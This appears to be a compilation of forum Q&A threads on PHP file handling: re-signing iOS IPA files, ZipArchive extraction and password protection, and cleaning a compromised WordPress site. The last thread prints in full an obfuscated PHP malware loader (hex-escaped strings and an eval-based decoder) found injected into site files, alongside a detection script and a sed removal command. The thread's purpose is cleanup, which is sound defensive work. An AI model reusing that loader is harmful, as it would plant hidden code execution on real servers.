re-sign IPA files using PHP - php

I have a problem with re-sign IPA files with PHP
this is my code:
<?php
/*
unzip app.ipa
rm -rf Payload/MyApp.app/_CodeSignature/
cp ~/Downloads/AdHoc.mobileprovision Payload/MyApp.app/embedded.mobileprovision
codesign -f -s "iPhone Distribution: Company Certificate" --resource-rules Payload/MyApp.app/ResourceRules.plist Payload/MyApp.app
zip -qr app-resigned.ipa Payload/
*/
if(file_exists('app.ipa')) {
rename('app.ipa', 'app.zip');
$zip = new ZipArchive;
$res = $zip->open('app.zip');
if ($res === TRUE) {
$zip->extractTo('C:/Users/abdul/Dropbox/127.0.0.1/ios');
$zip->close();
}
}
// remove _CodeSignature
if(file_exists('Payload/Gab.ai ObjC.app/_CodeSignature')) {
$dir = 'Payload/Gab.ai ObjC.app/_CodeSignature';
$it = new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it,
RecursiveIteratorIterator::CHILD_FIRST);
foreach($files as $file) {
if ($file->isDir()){
rmdir($file->getRealPath());
} else {
unlink($file->getRealPath());
}
}
rmdir($dir);
}
unlink('Payload/Gab.ai ObjC.app/embedded.mobileprovision');
// copy mobileprovision file
copy('embedded.mobileprovision', 'Payload/Gab.ai ObjC.app/embedded.mobileprovision');
// i think there is a problem here!
exec('codesign -f -s "iPhone Distribution: ****" --resource-rules Payload/Gab.ai ObjC.app/ResourceRules.plist Payload/Gab.ai ObjC.app');
?>
i have the app.ipa, embedded.mobileprovision and my Distribution.
but i think the problem with exec while using codesign it dose not create _CodeSignature folder !!
i don't have any idea about that codesign.
is there any one can help me?


First of all, "codesign" binary will work only on OSX.
The other issue that you are having is due to permission limitation. you need to chmod the php script as well as the out put folder "the ipas Working directory".
i know my reply is too late, i just saw the post and though to mention the solution as i had it before and it was fixed.
Good luck

Related

how to unzip .zip file in codeigniter 4 (PHP)

I am trying to extract zip file in codeigniter 4... I have the code below
$file_name = session()->get('file_name');
// Zip file name
$filename = "/public/$file_name";
$zip = new \ZipArchive;
$res = $zip->open($filename);
if ($res === true) {
// Unzip path
$path = "/public";
// Extract file
$zip->extractTo($path);
$zip->close();
return 'Site Updated Successfully';
} else {
return "failed to update $filename!";
}
}
but I get this result: return "failed to update $filename!";
Please can someone help me fix the issue with the code.

This has nothing specifically to do with Codeigniter. It's just using PHP and ZipArchive. The code looks OK - be sure the file is really in the /public/ directory and that it is a zip archive. The PHP site has examples that are like $zip = new ZipArchive; (without the \ char); maybe try that.

Could not open password protected zip archive

I was creating a zip archive with php 7.4 (lib-zip version 1.6.1) without any problems.
Now I try to protect these zip archive with a password. Not just for encrypting with php, but in general. I found this tutorial. It does what it should, but I could not read the files of the zip archive any more. If I doubleclick on the archive, the password prompt opens up, but it does not work with the password from the source code. I also copy and pasted it to prevent any keyboard struggle.
<?php
$zip = new ZipArchive();
$filePath = sprintf('%s/test/', __DIR__);
$fileName = 'test.zip';
$absoluteFilePath = $filePath . $fileName;
$excludeFolderNames = [
'.',
'..',
'.DS_Store',
$fileName,
];
$zipFlag = ZipArchive::CREATE;
if (file_exists($absoluteFilePath)) {
$zipFlag = ZipArchive::OVERWRITE;
}
$createFile = $zip->open($absoluteFilePath, $zipFlag);
if (true !== $createFile) {
throw new RuntimeException(sprintf('could not open file in "%s" caused by %s', $fileName, $createFile));
}
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($filePath));
$password = 'top-secret';
if (!$zip->setPassword($password)) {
throw new RuntimeException('Set password failed');
}
/** #var SplFileInfo $value */
foreach ($iterator as $key => $value) {
if (in_array($value->getFilename(), $excludeFolderNames)) {
continue;
}
$cleanFilePath = realpath($key);
if (!$cleanFilePath) {
throw new RuntimeException(sprintf('could not create real path from filepath: %s', $key));
}
$zipName = str_replace($filePath, '', $cleanFilePath);
if (!$zip->addFile($cleanFilePath, $zipName)) {
throw new RuntimeException(sprintf('Add file failed: %s', $cleanFilePath));
}
if (!$zip->setEncryptionName($zipName, ZipArchive::EM_AES_256)) {
throw new RuntimeException(sprintf('Set encryption failed: %s', $zipName));
}
}
$zip->close();
Does someone has the same problem or am I the problem?
UPDATE I:
I tought it solves my problem to save the zip-file outside the folder I want to zip. So I changed the following line:
$absoluteFilePath = sprintf('%s/%s', __DIR__, $fileName);
After a while the error occured again.
One possible reason I discovered, were .DS_Store files. In my example I exclude them. But the error occured again.
UPDATE II:
One further problem is, that there is no password prompt, if all files are empty.
UPDATE III:
Same code works with files without line break, but the error occurs, if the file has multiple lines.

I found help at the php-bugtracker. It turns out that I can extract all the files with an zip-extension like the comments tryed to tell me before. Now I wait for the new libzip version 1.7.0, where the default zip encryption is available. After this I hope I can extract my files without any extension.

Create a zip archive with a password

So, I creating a zip file with a password:
function createZip($fileName,$fileText,$zipFileName,$zipPassword)
{
shell_exec('zip -P '.$zipPassword.' '.$zipFileName.'.zip '.$fileName);
unlink($fileName);
return file_exists($zipFileName.'.zip');
}
$filex = "/backup/home/fyewhzjp/long_location_of_a_file/temp/data/map10/data.txt";
// $file_content = 'test';
$archive = "/backup/home/fyewhzjp/long_location_of_a_file/temp/data/map10/archive";
createZip($filex,$file_content,$archive,$pass);
And it works. I'm getting a archive.zip in my /temp/data/map folder on the website. But, when I open my archive I can see a bunch of folders, and data.txt at the end, let's say it will be
/backup/home/fyewhzjp/long_location_of_a_file/temp/data/map10/data.txt
So, I need to leave only data.txt in my folder, without other folders. How can I do it?

If anyone will face the same problem as I did, here is the solution:
Just add -jrq after zip in shell_exec like this:
shell_exec('zip -jrq -P '.$zipPassword.' '.$zipFileName.'.zip '.$fileName);
After that, full path will be ignored.

In addition to #Script47...
Pure PHP Available as of PHP 7.2.0 and PECL zip 1.14.0, respectively, if built against libzip ≥ 1.2.0.
<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip', ZipArchive::CREATE);
if ($res === TRUE) {
// Add files
$zip->addFromString('test.txt', 'file content goes here');
$zip->addFile('data.txt', 'entryname.txt');
// Set global (for each file) password
$zip->setPassword('your_password_here');
// This part will set that 'data.txt' will be encrypted with your password
$zip->setEncryptionName('data.txt', ZipArchive::EM_AES_128); // Have to encrypt each file in zip
$zip->close();
echo 'ok';
} else {
echo 'failed';
}
?>

Rather than using shell_exec why don't you just use the ZipArchive class with the functions ZipArchiveOpen::open and ZipArchive::setPassword, it seems that that would make things a lot easier.
<?php
$zip = new ZipArchive;
$res = $zip->open('test.zip', ZipArchive::CREATE);
if ($res === TRUE) {
$zip->addFromString('test.txt', 'file content goes here');
$zip->addFile('data.txt', 'entryname.txt');
$zip->setPassword('your_password_here');
$zip->close();
echo 'ok';
} else {
echo 'failed';
}
?>
Note:
This function only sets the password to be used to decompress the archive; it does not turn a non-password-protected ZipArchive into a password-protected ZipArchive.

How to zip and unzip zip files between linux host and windows

I have lot's of problem with ziping and unziping zip files between xammp windows server and linux host.
What's the way to zip files in xammp on windows and unzip it in linux host and vise versa?

PHP has built-in extension for zipping and unzipping:
<?php
$zip = new ZipArchive;
$res = $zip->open('file.zip');
if ($res === TRUE) {
$zip->extractTo('/myzips/extract_path/');
$zip->close();
echo 'woot!';
} else {
echo 'doh!';
}
?>

I would recommend Zippy it abstracts the platform and does a good job, BTW, it supports a couple of compression methods, please take a look at it.
Archive listing and extraction:
use Alchemy\Zippy\Zippy;
$zippy = Zippy::load();
$zippy->create('archive.zip', '/path/to/folder');
$archive = $zippy->open('build.tar');
// extract content to `/tmp`
$archive->extract('/tmp');
// iterates through members
foreach ($archive as $member) {
echo "archive contains $member \n";
}
Archive creation
use Alchemy\Zippy\Zippy;
$zippy = Zippy::load();
// creates an archive.zip that contains a directory "folder" that contains
// files contained in "/path/to/directory" recursively
$archive = $zippy->create('archive.zip', array(
'folder' => '/path/to/directory'
), recursive = true);

Removing a string in a PHP file with Start and End

I'm trying to clean a WordPress which has been infected by an exploit.
All php files were added a line like this at the beginning of it :
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} #error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
The content of this line is random for each files, but they all start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.
I'm trying to create a PHP file removing this line to all my files.
Here's what I've done now :
<?php
$dir_iterator = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($dir_iterator);
$infected = 0;
$clean = 0;
foreach ($iterator as $file) {
if($file->getExtension() == 'php'){
$f = fopen($file->getPathname(), 'r+');
$start = '<?php if(!isset($GLOBALS[';
$end = '-1; ?>';
if(fgets($f, 26) == '<?php if(!isset($GLOBALS[')
{
echo '<p style="color: red;"> The file '. $file->getPathname() . ' is infected ! </p>';
// Don't know what to do here
$infected++;
}
else
{
echo '<p style="color: green;"> The file '. $file->getPathname() . ' is clean ! </p>';
$clean++;
}
}
}
echo $infected.' files infected <br />';
echo $clean. ' files clean.';
?>
But I'm not very eased with file editing in PHP, so I would like to remove the line starting with my $start and ending with my $end .
I'm a bit lost with fseek, fwrite in the PHP doc, and don't really know which one I should use and how.
Waiting for your help :) !

You might want to switch tools for this job. Use sed(1):
$ sed -e '1 s/^<\?php if(!isset($GLOBALS\[.*-1; \?>//' *.php
You can write a thin exec() wrapper in PHP, if you have no shell access.

I am angry of ruined servers and I have written script as a class to solve this, when you don't have root access to server.
// Import and setup Guardian script
include '../NarniaGuardian/NarniaGuardian.php';
$Guard = new NarniaGD;
